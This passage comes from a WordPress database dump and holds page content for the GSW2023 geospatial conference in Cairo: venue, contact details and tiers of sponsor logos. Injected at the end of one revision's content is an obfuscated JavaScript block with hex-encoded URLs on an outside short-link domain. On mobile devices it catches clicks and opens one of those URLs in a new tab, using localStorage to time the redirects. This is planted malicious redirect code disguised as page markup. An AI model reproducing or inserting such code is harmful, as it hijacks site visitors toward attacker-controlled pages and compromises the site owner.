#311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:28:12','2023-08-16 00:28:12','',3066,'https://gsw2023.com/?p=5254',0,'revision','',0),
(5255,1,'2023-08-16 00:28:35','2023-08-16 00:28:35','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145556440{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145608986{margin-top: 25px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" 